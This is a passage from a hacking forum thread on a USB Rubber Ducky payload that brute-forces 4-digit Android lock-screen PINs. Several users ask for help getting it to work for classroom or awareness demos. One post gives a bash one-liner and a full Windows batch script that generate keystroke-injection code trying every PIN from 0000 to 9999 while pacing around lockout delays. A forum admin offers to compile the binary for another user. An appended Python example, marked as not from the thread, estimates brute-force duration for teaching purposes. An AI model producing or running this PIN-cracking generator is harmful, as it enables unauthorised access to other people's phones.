[Payload] Android Brute Force 4-digit pin


45 replies to this topic

#41 shrekthemp

shrekthemp
  • Members
  • Newbie

  • 4 posts

Posted 01 October 2015 - 09:48 PM

I am new to this program/script and USB Ducky.  We use Windows.  I went to the online tool USB ducky toolkit to implement the code referenced above.  Can someone help me recode it to work in the ducky toolkit?  I would like to show this exercise on our training phones in class.  Thank you.



#42 Mr-Protocol

Mr-Protocol
  • Root Admin
  • Hak.5 Packet Ninja

  • 4,061 posts
  • Gender:Male

Posted 02 October 2015 - 04:43 PM

What OS are you using? And is it the code from the first post? 

 

The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class.


Mr-Protocol @ irc.hak5.org #hak5
Mr-Protocol @ chat.freenode.org #hak5

 
I'm just watching a bad dream I never wake up from. -Spike Spiegel

 

https://keybase.io/mrprotocol

 

BitCoin: 1M85SAg2Ax2NQyq5hCdonbTw45sPT19aBY


#43 shrekthemp

shrekthemp
  • Members
  • Newbie

  • 4 posts

Posted 07 October 2015 - 07:42 PM

"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class" 

 

I am using it on Samsung note phones with 4 digit pin set.  It would be awesome to have you create the bin for me.  I still would like to learn how to recreate the script in the toolkit if possible.  My issue is the number creation I think.  Thanks



#44 Siem

Siem
  • Members
  • Newbie

  • 1 posts

Posted 15 October 2015 - 10:31 AM

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>

Instead of using a Linux terminal, I made a batch script for this; it does the same thing.
Here is the code:

@echo off
setlocal
set NUM=0
set COUNT=0

echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen>>input.txt
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

:START
cls
IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT)
IF %NUM% LEQ 9 (set ZERO=000)
IF %NUM% GTR 9 (set ZERO=00)
IF %NUM% GTR 99 (set ZERO=0)
IF %NUM% GTR 999 (set ZERO=%)
IF %NUM% EQU 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% +1
goto START

:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

You can change the delay a bit, I am still testing it, but this echoes 0000..9999 without using Linux.

 

~Siem
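For the classroom and awareness demos discussed in this thread, an added example (not part of any post here and not Hak5 code): it parses Ducky Script in the shape the batch file above writes and estimates how long exhausting a PIN space takes when the device forces a wait after a burst of wrong guesses. The function names, the sample script, and the assumption that the device enforces exactly the wait the script encodes are constructed for illustration.

```python
# Constructed sample in the shape the batch file writes (not device output):
# five guesses, the 30 s lockout wait plus a wake-up sequence, one more guess.
SAMPLE = """\
DELAY 500
STRING 0000
ENTER
DELAY 500
STRING 0001
ENTER
DELAY 500
STRING 0002
ENTER
DELAY 500
STRING 0003
ENTER
DELAY 500
STRING 0004
ENTER
DELAY 30000
ESC
STRING 0000
BACKSPACE
DELAY 500
STRING 0005
ENTER
"""

def profile(script):
    """Return (pin_guesses, total_delay_ms) for a Ducky Script text."""
    guesses = delay_ms = 0
    typed = False  # True while typed digits are waiting for ENTER
    for line in script.splitlines():
        cmd, _, arg = line.strip().partition(" ")
        if cmd == "DELAY":
            delay_ms += int(arg)
        elif cmd == "STRING":
            typed = arg.strip().isdigit()
        elif cmd == "ENTER":
            guesses += typed  # a second ENTER or a bare ENTER is not a guess
            typed = False
        elif cmd and cmd != "REM":
            typed = False  # ESC, BACKSPACE, etc. discard the typed digits
    return guesses, delay_ms

def exhaust_hours(digits, guess_ms, burst, lockout_ms):
    """Hours of delay to try every PIN, waiting lockout_ms after each burst."""
    total = 10 ** digits
    return (total * guess_ms + (total - 1) // burst * lockout_ms) / 3_600_000
```

With the numbers in the batch file (500 ms per guess, 30 s after every fifth guess), `exhaust_hours(4, 500, 5, 30000)` comes to about 18 hours, while a 6-digit PIN under the same policy takes about 75 days.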



#45 adamxk

adamxk
  • Active Members
  • Hak5 Fan

  • 19 posts

Posted 17 October 2015 - 06:29 PM

Why isn't this on the wiki?



#46 LoreLorm

LoreLorm
  • Members
  • Newbie

  • 1 posts

Posted 05 November 2015 - 10:44 AM

Hi,

 

I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone!

Any help would be gratefully received.  

I have a Samsung GT-S5830i, Android version 2.3.6

 

Thanks





